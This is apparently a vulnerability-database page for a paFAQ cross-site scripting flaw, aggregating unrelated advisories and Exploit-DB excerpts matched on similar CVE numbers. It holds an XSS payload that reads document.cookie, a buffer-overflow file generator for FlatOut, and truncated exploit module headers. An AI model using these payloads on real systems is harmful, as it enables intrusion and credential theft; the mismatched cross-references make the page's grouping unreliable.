CVE-2005-2011
Published 2005-06-20
Priority: P416
CVSS 2.0: 4.3 (medium), vector AV:N/AC:M/Au:N/C:N/I:P/A:N
Exploit: available
EPSS: 1.42% (69.5th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the id parameter in a Question action.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafaq | — | — |
CVSS provenance
nvd (v2.0): 4.3 MEDIUM, AV:N/AC:M/Au:N/C:N/I:P/A:N
cisa: 7.8 HIGH
vendor_redhat: 7.5 HIGH
GHSA
GHSA-9ch3-rm27-g282: Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1
ghsa_unreviewed · 2022-05-01 · CVE-2005-2011 [MEDIUM]
---
Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the id parameter in a Question action.
CISA
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
cisa · 2022-03-28 · CVSS 7.8 · CVE-2011-2005 [HIGH] · CWE-264
---
Affected: Microsoft Ancillary Function Driver (afd.sys)
afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2011-2005
Remediation Due Date: 2022-04-18
Red Hat
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
vendor_redhat · 2011-08-28 · CVSS 5.0 · CVE-2011-3205 [MEDIUM]
---
Buffer overflow in the gopherToHTML function in gopher.cc in the Gopher reply parser in Squid 3.0 before 3.0.STABLE26, 3.1 before 3.1.15, and 3.2 before 3.2.0.11 allows remote Gopher servers to cause a denial of service (memory corruption and daemon restart) or possibly have unspecified other impact via a long line in a response. NOTE: This issue exists because of a CVE-2005-0094 regression.
Package: squid (Red Hat Enterprise Linux 4) - Not affected
Package: squid (Red Hat Enterprise Linux 5) - Not affected
Red Hat
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
vendor_redhat · 2010-12-08 · CVSS 7.5 · CVE-2011-0752 [HIGH]
---
The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.
Statement: We do not consider this flaw to be a security issue as it is only exploitable by the script author. No trust boundary is crossed.
This issue did not affect the versions of PHP as shipped with Red Hat Enterprise Linux 3, 4, or 5 (php). This issue was addressed in the php53 packages as shipped in Red Hat Enterprise Linux 5 before t
No detection rules found.
Exploit-DB
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
exploitdb · 2012-10-10 · CVE-2011-2005
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
class Metasploit3 'MS11-080 AfdJoinLeaf Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the AfdJoinLeaf function of the
afd.sys driver to overwrite data in kernel space. An address
within the HalDispatchTable is overwritten and when triggered
with a call to NtQueryIntervalProfile will execute shellcode.
This module will elevate itself to SY
Exploit-DB
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
exploitdb · 2011-11-30 · CVE-2011-5173
---
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..
use strict;
use warnings;
my $file = "playlist_0.bed";
my $head = "Title = \"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop = {" . "\r}";
# The original script opened $File and closed $FILE; one lexical handle is used for both.
open(my $fh, '>', $file) or die "Cannot open $file: $!";
print $fh $head.$junk.$tail;
close($fh);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
Exploit-DB
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
exploitdb · 2011-11-30 · CVSS 7.8 · CVE-2011-2005 [HIGH]
---
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng
Exploit-DB
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
exploitdb · 2011-08-09 · CVE-2011-1976
---
source: https://www.securityfocus.com/bid/49033/info
Microsoft Visual Studio is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information.
https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00T
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb · 2011-07-08
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb · 2011-02-08 · CVE-2008-5416
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb · 2011-01-24 · CVE-2008-5416
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
PAFaq - Question Cross-Site Scripting
exploitdb · 2005-06-20 · CVE-2005-2011
---
source: https://www.securityfocus.com/bid/14001/info
paFaq is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Bugzilla
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
bugzilla · 2011-08-30 · CVSS 5.0 · [MEDIUM]
---
A flaw was reported [1] in how Squid parsed responses from Gopher servers. This flaw could result in a buffer overflow if a Gopher server were to return a line longer than 4096 bytes, leading to memory corruption and a crash. This flaw is an extension of SQUID-2005:1 (or CVE-2005-0094) in Squid 3.x, due to increased packet read sizes. A malicious user could set up a fake Gopher server and forward requests to it through Squid. A specially crafted response from that server could cause Squid to restart.
This has been corrected in upstream versions 3.2.0.11, 3.1.15, and 3.0.STABLE26. Patches for 3.0 [2], 3.1 [3], and 3.2 [4] are available.
[1] http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
[2] htt
Bugzilla
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
bugzilla · 2011-02-01 · CVSS 5.0 · [MEDIUM]
---
A double-free flaw was found in the way the MIT Kerberos KDC handled initial authentication requests (AS-REQ), when the KDC was configured to provide the PKINIT capability. A remote attacker could use this flaw to cause the KDC daemon to abort by using a specially-crafted AS-REQ request. Different vulnerability than CVE-2010-1320 and CVE-2005-1174.
Discussion:
Created attachment 476397
Proposed patch from Nalin Dahyabhai to fix the issue
---
This issue did NOT affect the versions of the krb5 package, as shipped with Red Hat Enterprise Linux 3, 4, or 5.
This issue affects the version of the krb5 package, as shipped with Red Hat Enterprise Linux 6.
--
This i
Bugzilla
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
bugzilla · 2011-01-28 · CVSS 7.5 · [HIGH]
---
Originally, CVE-2005-3534 [1] was assigned to NBD and addressed in the nbd-v2.8.3 version [2] via changeset [3]. But nbd-v2.9.0 [4] contains the issue again. This flaw was fixed a second time via upstream changeset [5].
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3534
[2] http://sourceforge.net/project/shownotes.php?release_id=380202&group_id=13229
[3] https://github.com/yoe/nbd/commit/4ed24fe0d64c7cc9963c57b52cad1555ad7c6b60
[4] http://sourceforge.net/projects/nbd/files/nbd/2.9.0/
[5] https://github.com/yoe/nbd/commit/3ef52043861ab16352d49af89e048ba6339d6df8
References:
[6] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=611187
Discussion:
This issue affects the versions of the nbd package, as shipped
with